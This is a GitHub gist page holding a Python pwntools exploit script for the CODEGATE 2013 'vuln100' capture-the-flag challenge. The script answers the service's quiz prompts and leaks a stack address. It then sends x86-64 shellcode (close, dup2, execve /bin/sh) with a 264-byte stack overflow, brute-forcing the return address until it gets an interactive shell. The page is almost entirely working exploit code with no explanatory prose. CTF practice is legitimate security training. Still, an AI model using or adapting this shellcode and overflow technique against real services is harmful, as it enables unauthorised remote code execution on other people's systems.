-
-
Save akiym/07b444fe256c74dc9a5d to your computer and use it in GitHub Desktop.
CODEGATE 2013 vuln100 writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import os | |
import sys | |
import time | |
import re | |
from pwn import * | |
REMOTE = False | |
if REMOTE: | |
host = '' | |
port = 0 | |
else: | |
host = '127.0.0.1' | |
port = 6666 | |
def connect(): | |
s = remote(host, port, silent=True) | |
s.recv() | |
s.recv() | |
for answer in ['arsenal', 'gyeongbokgung', 'psy']: | |
s.send(answer + '\n') | |
s.recv() | |
s.recv() | |
return s | |
s = connect() | |
s.send('\0') | |
# stack leak | |
#print hexdump(s.recvall()) | |
nickname = u64(s.recv(8)) | |
log.info('leaked nickname address: %x' % nickname) | |
# close + dup2 + execve /bin/sh | |
shellcode = '\x48\x31\xff\x40\xb7\x03\x48\x31\xc0\xb0\x03\x0f\x05\x40\xb7\x04\x48\x31\xf6\x40\xb6\x03\x48\x31\xc0\x48\xff\xce\xb0\x21\x0f\x05\x75\xf4' + '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x90' | |
# brute-force :) | |
for x in range(0, 1000, 8): | |
print x | |
s = connect() | |
payload = ( | |
shellcode + | |
'\x90' * (264 - len(shellcode)) + | |
p64(nickname - x) | |
) | |
s.send(payload) | |
s.recvall() | |
s.send('ls\n') | |
if s.recv(): | |
s.interactive() | |
sys.exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment